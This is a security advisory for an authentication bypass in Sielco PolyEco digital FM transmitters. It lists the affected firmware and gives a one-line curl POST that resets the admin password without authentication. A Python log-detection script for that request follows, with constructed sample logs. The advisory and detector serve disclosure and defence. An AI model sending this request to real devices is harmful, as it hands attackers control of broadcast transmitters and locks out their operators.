
Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass

Sielco PolyEco Digital FM Transmitter version 2.0.6 suffers from authentication bypass, account takeover / lockout, and privilege escalation vulnerabilities that can be triggered by directly calling the users object and modifying the password of the two constants user/role (user/admin). An unauthenticated adversary can exploit this by issuing a single POST request to the vulnerable endpoint to gain unauthorized access to the affected device with administrative privileges.

Packet Storm
Sielco PolyEco Digital FM Transmitter 2.0.6 Account Takeover / Lockout / EoP

Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
                  PolyEco1000 CPU:1.9.4 FPGA:10.19
                  PolyEco1000 CPU:1.9.3 FPGA:10.19
                  PolyEco500 CPU:1.7.0 FPGA:10.16
                  PolyEco300 CPU:2.0.2 FPGA:10.19
                  PolyEco300 CPU:2.0.0 FPGA:10.19

Summary: PolyEco is the innovative family of high-end digital
FM transmitters of Sielco. They are especially suited as high
performance power system exciters or compact low-mid power
transmitters. The same cabinet may in fact be fitted with 50,
100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
1000).

All features can be controlled via the large touch-screen display
4.3" or remotely. Many advanced features are inside by default
in the basic version such as: stereo and RDS encoder, audio
change-over, remote-control via LAN and SNMP, "FFT" spectral
analysis of the audio sources, SFN synchronization and much more.

Desc: The application suffers from an authentication bypass,
account takeover/lockout and elevation of privileges vulnerability
that can be triggered by directly calling the users object and
effectively modifying the password of the two constants user/role
(user/admin). This can be exploited by an unauthenticated adversary
by issuing a single POST request to the vulnerable endpoint and
gain unauthorized access to the affected device with administrative
privileges.

Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2023-5765
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5765.php

26.01.2023

--

# Change admin pwd
$ curl -X POST -F "pwd_admin=t00t" -F "pwd_user=" http://RADIOFM/protect/users.htm
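A detection check for the password-change request described in the advisory, added here as an example and not part of the original advisory or the vendor's software. It assumes a reverse proxy in front of the transmitter that enforces its own authentication and writes combined-format access logs, and a management subnet of 10.20.0.0/24; the function name and the sample log lines are constructed for illustration.

```python
import ipaddress
import re

# Endpoint named in the advisory; a POST to it can reset the user/admin passwords.
ENDPOINT = "/protect/users.htm"

# Combined log format as written by a reverse proxy placed in front of the
# device (assumption: the transmitter itself is not relied on for request logs).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_password_posts(lines, mgmt_networks):
    """Return findings for POSTs to ENDPOINT that carry no authenticated user
    at the proxy or that come from outside the management networks."""
    nets = [ipaddress.ip_network(n) for n in mgmt_networks]
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Drop the query string, a trailing slash and case differences so
        # trivial variations of the path are still matched.
        path = m["path"].split("?", 1)[0].rstrip("/").lower()
        if path != ENDPOINT:
            continue
        src = ipaddress.ip_address(m["ip"])
        reasons = []
        if m["user"] == "-":
            reasons.append("no authenticated user")
        if not any(src in n for n in nets):
            reasons.append("source outside management network")
        if reasons:
            findings.append({"ip": m["ip"], "time": m["ts"],
                             "status": int(m["status"]), "reasons": reasons})
    return findings

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.20.0.5 - operator [26/Jan/2023:09:14:02 +0000] "POST /protect/users.htm HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.77 - - [26/Jan/2023:11:41:19 +0000] "POST /protect/users.htm HTTP/1.1" 200 498 "-" "curl/7.85.0"',
    '10.20.0.9 - - [26/Jan/2023:11:50:03 +0000] "GET /protect/users.htm HTTP/1.1" 401 0 "-" "Mozilla/5.0"',
    '10.20.0.9 - - [26/Jan/2023:12:02:44 +0000] "POST /protect/users.htm?x=1 HTTP/1.1" 200 498 "-" "python-requests/2.28"',
]

if __name__ == "__main__":
    for finding in find_password_posts(SAMPLE_LOG, ["10.20.0.0/24"]):
        print(finding)
```

A finding with a 2xx status means the request reached the device and the user/admin passwords should be treated as changed.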
